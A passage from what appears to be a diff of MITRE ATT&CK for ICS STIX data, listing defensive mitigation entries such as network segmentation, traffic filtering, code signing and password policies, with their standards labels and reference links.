"ATT&CK for ICS", + "type": "x-mitre-matrix", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "modified": "2023-03-30T20:55:21.006Z", + "name": "Application Isolation and Sandboxing", + "description": "Restrict the execution of code to a virtual environment on or in-transit to an endpoint system.", + "labels": [ + "IEC 62443-3-3:2013 - SR 5.4", + "IEC 62443-4-2:2019 - CR 5.4", 
+ "NIST SP 800-53 Rev. 4 - SI-3" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "type": "course-of-action", + "id": "course-of-action--059ba11e-e3dc-49aa-84ca-88197f40d4ea", + "created": "2019-06-11T17:06:56.230Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/M0948", + "external_id": "M0948" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-03-30T20:55:19.604Z", + "name": "Filter Network Traffic", + "description": "Use network appliances to filter ingress or egress traffic and perform protocol-based filtering. Configure software on endpoints to filter network traffic. Perform inline allow/denylisting of network messages based on the application layer (OSI Layer 7) protocol, especially for automation protocols. Application allowlists are beneficial when there are well-defined communication sequences, types, rates, or patterns needed during expected system operations. Application denylists may be needed if all acceptable communication sequences cannot be defined, but instead a set of known malicious uses can be denied (e.g., excessive communication attempts, shutdown messages, invalid commands). Devices performing these functions are often referred to as deep-packet inspection (DPI) firewalls, context-aware firewalls, or firewalls blocking specific automation/SCADA protocol aware firewalls. (Citation: Centre for the Protection of National Infrastructure February 2005)", + "labels": [ + "IEC 62443-3-3:2013 - SR 5.1", + "IEC 62443-4-2:2019 - CR 5.1", + "NIST SP 800-53 Rev. 
4 - AC-3; SC-7" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "type": "course-of-action", + "id": "course-of-action--11f242bc-3121-438c-84b2-5cbd46a4bb17", + "created": "2019-06-11T16:33:55.337Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/M0937", + "external_id": "M0937" + }, + { + "source_name": "Centre for the Protection of National Infrastructure February 2005", + "description": "Centre for the Protection of National Infrastructure 2005, February FIREWALL DEPLOYMENT FOR SCADA AND PROCESS CONTROL NETWORKS Retrieved. 2020/09/17 ", + "url": "https://www.energy.gov/sites/prod/files/Good%20Practices%20Guide%20for%20Firewall%20Deployment.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-03-30T20:55:17.426Z", + "name": "Restrict Web-Based Content", + "description": "Restrict use of certain websites, block downloads/attachments, block Javascript, restrict browser extensions, etc.", + "labels": [ + "IEC 62443-3-3:2013 - SR 2.4", + "IEC 62443-4-2:2019 - HDR 2.4", + "NIST SP 800-53 Rev. 
4 - SC-18" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "type": "course-of-action", + "id": "course-of-action--143b4398-3222-480a-b6a4-e131bc2d3144", + "created": "2019-06-06T20:52:59.206Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/M0921", + "external_id": "M0921" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-03-31T19:16:54.636Z", + "name": "Validate Program Inputs", + "description": "Devices and programs designed to interact with control system parameters should validate the format and content of all user inputs and actions to ensure the values are within intended operational ranges. These values should be evaluated and further enforced through the program logic running on the field controller. If a problematic or invalid input is identified, the programs should either utilize a predetermined safe value or enter a known safe state, while also logging or alerting on the event.(Citation: PLCTop20 Mar 2023)", + "labels": [ + "NIST SP 800-53 Rev. 
4 - SI-10", + "IEC 62443-3-3:2013 - SR 3.5", + "IEC 62443-3-3:2013 - SR 3.6", + "IEC 62443-4-2:2019 - CR 3.5", + "IEC 62443-4-2:2019 - CR 3.6" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "type": "course-of-action", + "id": "course-of-action--1cbcceef-3233-4062-aa86-ec91afe39517", + "created": "2023-03-22T15:49:55.439Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/M0818", + "external_id": "M0818" + }, + { + "source_name": "PLCTop20 Mar 2023", + "description": "PLC Security, Top 20 Community. (2021, June 15). Secure PLC Coding Practices: Top 20 version 1.0. Retrieved March 22, 2023.", + "url": "https://plc-security.com/content/Top_20_Secure_PLC_Coding_Practices_V1.0.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-03-30T20:55:18.480Z", + "name": "Network Segmentation", + "description": "Architect sections of the network to isolate critical systems, functions, or resources. Use physical and logical segmentation to prevent access to potentially sensitive systems and information. Use a DMZ to contain any internet-facing services that should not be exposed from the internal network. Restrict network access to only required systems and services. In addition, prevent systems from other networks or business functions (e.g., enterprise) from accessing critical process control systems. For example, in IEC 62443, systems within the same secure level should be grouped into a zone, and access to that zone is restricted by a conduit, or mechanism to restrict data flows between zones by segmenting the network. 
(Citation: IEC February 2019) (Citation: IEC August 2013)", + "labels": [ + "IEC 62443-3-3:2013 - SR 5.1", + "IEC 62443-4-2:2019 - CR 5.1", + "NIST SP 800-53 Rev. 4 - AC-3" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "type": "course-of-action", + "id": "course-of-action--1e7ccfc0-94c8-496e-8d27-032120892291", + "created": "2019-06-10T20:41:03.271Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/M0930", + "external_id": "M0930" + }, + { + "source_name": "IEC February 2019", + "description": "IEC 2019, February Security for industrial automation and control systems - Part 4-2: Technical security requirements for IACS components Retrieved. 2020/09/25 ", + "url": "https://webstore.iec.ch/publication/34421" + }, + { + "source_name": "IEC August 2013", + "description": "IEC 2013, August Industrial communication networks - Network and system security - Part 3-3: System security requirements and security levels Retrieved. 2020/09/25 ", + "url": "https://webstore.iec.ch/publication/7033" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-04-11T20:51:32.610Z", + "name": "Restrict Library Loading", + "description": "Prevent abuse of library loading mechanisms in the operating system and software to load untrusted code by configuring appropriate library loading mechanisms and investigating potential vulnerable software.", + "labels": [ + "IEC 62443-3-3:2013 - SR 7.7", + "IEC 62443-4-2:2019 - CR 7.7", + "NIST SP 800-53 Rev. 
4 - CM-7" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "type": "course-of-action", + "id": "course-of-action--2ab9fc6d-3cf6-4d7b-85f1-3ad6949233b3", + "created": "2019-06-11T17:00:01.740Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/M0944", + "external_id": "M0944" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2022-10-24T15:09:07.609Z", + "name": "Active Directory Configuration", + "description": "Configure Active Directory to prevent use of certain techniques; use security identifier (SID) Filtering, etc.", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "type": "course-of-action", + "id": "course-of-action--2f0160b7-e982-49d7-9612-f19b810f1722", + "created": "2019-06-06T16:39:58.291Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/M0915", + "external_id": "M0915" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-03-30T20:55:18.665Z", + "name": "Network Intrusion Prevention", + "description": "Use intrusion detection signatures to block traffic at network boundaries. 
In industrial control environments, network intrusion prevention should be configured so it will not disrupt protocols and communications responsible for real-time functions related to control or safety.", + "labels": [ + "IEC 62443-3-3:2013 - SR 6.2", + "IEC 62443-4-2:2019 - CR 6.2", + "NIST SP 800-53 Rev. 4 - SI-4" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "type": "course-of-action", + "id": "course-of-action--3172222b-4983-43f7-8983-753ded4f13bc", + "created": "2019-06-10T20:46:02.263Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/M0931", + "external_id": "M0931" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-03-30T20:55:17.759Z", + "name": "Restrict Registry Permissions", + "description": "Restrict the ability to modify certain hives or keys in the Windows Registry.", + "labels": [ + "IEC 62443-3-3:2013 - SR 2.1", + "IEC 62443-4-2:2019 - CR 2.1", + "NIST SP 800-53 Rev. 
4 - AC-6" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "type": "course-of-action", + "id": "course-of-action--3222a807-521b-4a1a-aa13-f1cda45734b3", + "created": "2019-06-06T20:58:59.577Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/M0924", + "external_id": "M0924" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-03-30T20:55:14.442Z", + "name": "Data Loss Prevention", + "description": "Data Loss Prevention (DLP) technologies can be used to help identify adversarial attempts to exfiltrate operational information, such as engineering plans, trade secrets, recipes, intellectual property, or process telemetry. DLP functionality may be built into other security products such as firewalls or standalone suites running on the network and host-based agents. 
DLP may be configured to prevent the transfer of information through corporate resources such as email, web, and physical media such as USB for host-based solutions.", + "labels": [ + "IEC 62443-3-3:2013 - SR 4.1", + "IEC 62443-4-2:2019 - CR 4.1" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "type": "course-of-action", + "id": "course-of-action--337c4e2a-21a7-4d9a-bfee-9efd6cebf0e5", + "created": "2020-09-11T16:32:21.854Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/M0803", + "external_id": "M0803" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-03-30T20:55:14.081Z", + "name": "Access Management", + "description": "Access Management technologies can be used to enforce authorization polices and decisions, especially when existing field devices do not provided sufficient capabilities to support user identification and authentication. (Citation: McCarthy, J et al. July 2018) These technologies typically utilize an in-line network device or gateway system to prevent access to unauthenticated users, while also integrating with an authentication service to first verify user credentials. (Citation: Centre for the Protection of National Infrastructure November 2010)", + "labels": [ + "IEC 62443-3-3:2013 - SR 2.1", + "IEC 62443-4-2:2019 - CR 2.1", + "NIST SP 800-53 Rev. 
4 - AC-3" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "type": "course-of-action", + "id": "course-of-action--3992ce42-43e9-4bea-b8db-a102ec3ec1e3", + "created": "2020-09-11T16:32:21.854Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/M0801", + "external_id": "M0801" + }, + { + "source_name": "McCarthy, J et al. July 2018", + "description": "McCarthy, J et al. 2018, July NIST SP 1800-2 Identity and Access Management for Electric Utilities Retrieved. 2020/09/17 ", + "url": "https://doi.org/10.6028/NIST.SP.1800-2" + }, + { + "source_name": "Centre for the Protection of National Infrastructure November 2010", + "description": "Centre for the Protection of National Infrastructure 2010, November Configuring and Managing Remote Access for Industrial Control Systems Retrieved. 
2020/09/25 ", + "url": "https://us-cert.cisa.gov/sites/default/files/recommended_practices/RP_Managing_Remote_Access_S508NC.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-10-24T15:09:07.609Z", + "name": "Mitigation Limited or Not Effective", + "description": "This type of attack technique cannot be easily mitigated with preventative controls since it is based on the abuse of system features.", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "type": "course-of-action", + "id": "course-of-action--469b78dd-a54d-4f7c-8c3b-4a1dd916b433", + "created": "2020-09-11T16:32:21.854Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/M0816", + "external_id": "M0816" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-03-30T20:55:21.352Z", + "name": "Exploit Protection", + "description": "Use capabilities to detect and block conditions that may lead to or be indicative of a software exploit occurring.", + "labels": [ + "IEC 62443-3-3:2013 - SR 3.2", + "IEC 62443-4-2:2019 - CR 3.2", + "NIST SP 800-53 Rev. 
4 - SI-16" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "type": "course-of-action", + "id": "course-of-action--49363b74-d506-4342-bd63-320586ebadb9", + "created": "2019-06-11T17:10:57.070Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/M0950", + "external_id": "M0950" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-03-30T20:55:19.179Z", + "name": "Limit Access to Resource Over Network", + "description": "Prevent access to file shares, remote access to systems, unnecessary services. Mechanisms to limit access may include use of network concentrators, RDP gateways, etc.", + "labels": [ + "IEC 62443-3-3:2013 - SR 5.1", + "IEC 62443-4-2:2019 - CR 5.1", + "NIST SP 800-53 Rev. 
4 - AC-3; SC-7" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "type": "course-of-action", + "id": "course-of-action--49b306c1-a046-42c5-a4d2-30f264ada110", + "created": "2019-06-11T16:30:16.672Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/M0935", + "external_id": "M0935" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-03-30T20:55:19.774Z", + "name": "Execution Prevention", + "description": "Block execution of code on a system through application control, and/or script blocking.", + "labels": [ + "IEC 62443-3-3:2013 - SR 3.2", + "IEC 62443-4-2:2019 - CR 3.2", + "NIST SP 800-53 Rev. 4 - SI-3" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "type": "course-of-action", + "id": "course-of-action--4fa717d9-cabe-47c8-8cdd-86e9e2e37f30", + "created": "2019-06-11T16:35:25.488Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/M0938", + "external_id": "M0938" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-04-05T14:21:27.977Z", + "name": "Static Network Configuration", + "description": "Configure hosts and devices to use static network configurations when possible, protocols that require dynamic discovery/addressing (e.g., ARP, DHCP, DNS) can be used to manipulate network message forwarding and enable various AiTM attacks. 
This mitigation may not always be usable due to limited device features or challenges introduced with different network configurations.", + "labels": [ + "IEC 62443-3-3:2013 - SR 7.7", + "IEC 62443-4-2:2019 - CR 7.7", + "NIST SP 800-53 Rev. 4 - CM-7" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.1", + "type": "course-of-action", + "id": "course-of-action--52c7a1a9-3a78-4528-a44f-cd7b0fa3541a", + "created": "2019-06-06T21:16:18.709Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/M0814", + "external_id": "M0814" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-03-30T20:55:18.097Z", + "name": "Password Policies", + "description": "Set and enforce secure password policies for accounts.", + "labels": [ + "IEC 62443-3-3:2013 - SR 1.5", + "IEC 62443-4-2:2019 - CR 1.5", + "NIST SP 800-53 Rev. 
4 - IA-5" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "type": "course-of-action", + "id": "course-of-action--5d97c693-e054-48ba-a3a3-eaf6942dfb65", + "created": "2019-06-06T21:10:35.792Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/M0927", + "external_id": "M0927" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-03-30T20:55:17.929Z", + "name": "Privileged Account Management", + "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.", + "labels": [ + "IEC 62443-3-3:2013 - SR 1.3", + "IEC 62443-4-2:2019 - CR 1.3", + "NIST SP 800-53 Rev. 4 - AC-2" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "type": "course-of-action", + "id": "course-of-action--622fe4d4-0e8e-4d17-9c25-6c9cef1f15d5", + "created": "2019-06-06T21:09:47.115Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/M0926", + "external_id": "M0926" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-03-30T20:55:14.615Z", + "name": "Human User Authentication", + "description": "Require user authentication before allowing access to data or accepting commands to a device. While strong multi-factor authentication is preferable, it is not always feasible within ICS environments. 
Performing strong user authentication also requires additional security controls and processes which are often the target of related adversarial techniques (e.g., Valid Accounts, Default Credentials). Therefore, associated ATT&CK mitigations should be considered in addition to this, including [Multi-factor Authentication](https://attack.mitre.org/mitigations/M0932), [Account Use Policies](https://attack.mitre.org/mitigations/M0936), [Password Policies](https://attack.mitre.org/mitigations/M0927), [User Account Management](https://attack.mitre.org/mitigations/M0918), [Privileged Account Management](https://attack.mitre.org/mitigations/M0926), and [User Account Control](https://attack.mitre.org/mitigations/M1052).", + "labels": [ + "IEC 62443-3-3:2013 - SR 1.1", + "IEC 62443-4-2:2019 - CR 1.1", + "NIST SP 800-53 Rev. 4 - IA-2" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "type": "course-of-action", + "id": "course-of-action--66cfe23e-34b6-4583-b178-ed6a412db2b0", + "created": "2020-09-11T16:32:21.854Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/M0804", + "external_id": "M0804" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-10-24T15:09:07.609Z", + "name": "SSL/TLS Inspection", + "description": "Break and inspect SSL/TLS sessions to look at encrypted web traffic for adversary activity.", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "type": "course-of-action", + "id": 
"course-of-action--6a02e38a-9629-40c0-8c7d-e98e3470315c", + "created": "2019-06-06T20:15:34.146Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/M0920", + "external_id": "M0920" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-03-30T20:55:20.464Z", + "name": "Code Signing", + "description": "Enforce binary and application integrity with digital signature verification to prevent untrusted code from executing.", + "labels": [ + "IEC 62443-3-3:2013 - SR 3.4", + "IEC 62443-4-2:2019 - CR 3.4", + "NIST SP 800-53 Rev. 4 - SI-7" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "type": "course-of-action", + "id": "course-of-action--71eb7dad-07eb-4bbc-9df0-ac57bf2fba4a", + "created": "2019-06-11T17:01:25.405Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/M0945", + "external_id": "M0945" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-03-30T20:55:15.949Z", + "name": "Software Process and Device Authentication", + "description": "Require the authentication of devices and software processes where appropriate. Devices that connect remotely to other systems should require strong authentication to prevent spoofing of communications. Furthermore, software processes should also require authentication when accessing APIs.", + "labels": [ + "IEC 62443-3-3:2013 - SR 1.2", + "IEC 62443-4-2:2019 - CR 1.2", + "NIST SP 800-53 Rev. 
4 - IA-9" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "type": "course-of-action", + "id": "course-of-action--72e46e53-e12d-4106-9c70-33241b6ed549", + "created": "2019-06-06T21:16:18.709Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/M0813", + "external_id": "M0813" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-03-30T20:55:15.230Z", + "name": "Encrypt Network Traffic", + "description": "Utilize strong cryptographic techniques and protocols to prevent eavesdropping on network communications.", + "labels": [ + "IEC 62443-3-3:2013 - SR 4.1", + "IEC 62443-4-2:2019 - CR 4.1", + "NIST SP 800-53 Rev. 4 - SC-8" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "type": "course-of-action", + "id": "course-of-action--7f153c28-e5f1-4764-88fb-eea1d9b0ad4a", + "created": "2020-09-11T16:32:21.854Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/M0808", + "external_id": "M0808" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-03-30T20:55:19.383Z", + "name": "Account Use Policies", + "description": "Configure features related to account use like login attempt lockouts, specific login times, etc.", + "labels": [ + "IEC 62443-3-3:2013 - SR 1.11", + "IEC 62443-4-2:2019 - CR 1.11", + "NIST SP 800-53 Rev. 
4 - IA-5" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "type": "course-of-action", + "id": "course-of-action--86b455f2-fb63-4043-93a8-32a3a7703a02", + "created": "2019-06-11T16:32:21.854Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/M0936", + "external_id": "M0936" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-03-30T20:55:16.730Z", + "name": "Application Developer Guidance", + "description": "This mitigation describes any guidance or training given to developers of applications to avoid introducing security weaknesses that an adversary may be able to take advantage of.", + "labels": [ + "NIST SP 800-53 Rev. 4 - AT-3" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "type": "course-of-action", + "id": "course-of-action--8a3aadd0-b5f4-433a-800e-4893e4196bb7", + "created": "2017-10-25T14:48:53.732Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/M0913", + "external_id": "M0913" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-03-30T20:55:20.632Z", + "name": "Boot Integrity", + "description": "Use secure methods to boot a system and verify the integrity of the operating system and loading mechanisms.", + "labels": [ + "IEC 62443-4-2:2019 - CR 3.14", + "NIST SP 800-53 Rev. 
